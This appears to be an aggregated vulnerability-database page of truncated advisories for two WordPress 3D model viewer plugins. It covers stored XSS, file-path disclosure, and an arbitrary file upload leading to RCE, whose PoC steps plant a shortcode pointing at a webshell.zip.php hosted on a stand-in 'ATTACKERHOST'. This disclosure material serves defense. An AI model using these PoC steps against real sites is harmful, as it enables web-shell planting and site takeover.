EUVD-2024-28479
Malicious code in bioql PyPI...
CVE-2024-30559
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS. This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...
CVE-2024-30559 WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS. This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...
CVE-2024-30559
CVE-2024-30559 is a cross-site scripting (Stored XSS) vulnerability reported in the Spin 360 deg and 3D Model Viewer WordPress plugin. The CVE entry notes the flaw affects Spin 360 deg and 3D Model Viewer versions from an unspecified baseline up to 1.2.7. The linked Red Hat entry reiterates the i...
CVE-2024-30559 WordPress Spin 360 deg and 3D Model Viewer plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Maurice Spin 360 deg and 3D Model Viewer allows Stored XSS. This issue affects Spin 360 deg and 3D Model Viewer: from n/a through 1.2.7...
WordPress Spin 360 deg and 3D Model Viewer Plugin <= 1.2.7 is vulnerable to Cross Site Scripting (XSS)
Software: Spin 360 deg and 3D Model Viewer; Type: Plugin; Vulnerable versions: = 1.2.7; Fixed in: N/A; OWASP Top 10: A3: Injection; Classification: Cross Site Scripting (XSS); CVE: CVE-2024-30559; Patch priority: Low; CVSS severity: Low 6.5; Developer: Claim ownership; PSID: 26eafe92fc92; Credits: LVT-tholv2k; Required...
CVE-2023-4311
CVE-2023-4311 affects the Vrm 360 3D Model Viewer WordPress plugin (versions up to 1.2.1). The vulnerability is an arbitrary file upload due to insufficient checks in a plugin shortcode, enabling potential remote code execution. Public sources in the connected records describe PoCs and demonstrat...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description: The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php. 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Path traversal
The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode...
CVE-2023-5177
CVE-2023-5177 affects the Vrm 360 3D Model Viewer WordPress plugin (
WordPress Vrm 360 3D Model Viewer Plugin <= 1.2.1 is vulnerable to Sensitive Data Exposure
Software: Vrm 360 3D Model Viewer; Type: Plugin; Vulnerable versions: = 1.2.1; Fixed in: N/A; OWASP Top 10: A5: Security Misconfiguration; Classification: Sensitive Data Exposure; CVE: CVE-2023-5177; Patch priority: Low; CVSS severity: Low 4.3; Developer: Claim ownership; PSID: 41f6e6c8c32c; Credits: Jonatas Souza Vill...
Vrm 360 3D Model Viewer <= 1.2.1 - Full Path Disclosure
Description: The plugin exposes the full path of a file when putting in a non-existent file in a parameter of the shortcode. PoC: 1. Create a page. 2. Place the shortcode vrm360 canvasname=s1 modelurl=SACharacter.zip aspectratio=1.8 initialoffset=0.9 on the page. SACharacter.zip should be a...